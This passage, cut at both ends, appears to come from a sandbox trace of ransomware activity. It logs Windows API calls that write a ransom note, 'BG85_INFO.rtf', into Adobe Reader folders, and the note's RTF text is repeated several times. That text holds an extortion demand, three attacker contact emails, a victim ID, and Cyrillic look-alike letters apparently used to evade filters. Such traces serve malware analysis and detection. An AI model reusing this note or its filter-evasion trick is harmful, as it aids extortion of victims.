p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.545] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.546] CloseHandle (hObject=0x1fc) returned 1 [0064.547] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\bg85_info.rtf")) returned 0xffffffff [0064.547] GetLastError () returned 0x2 [0064.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.547] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.548] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.548] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 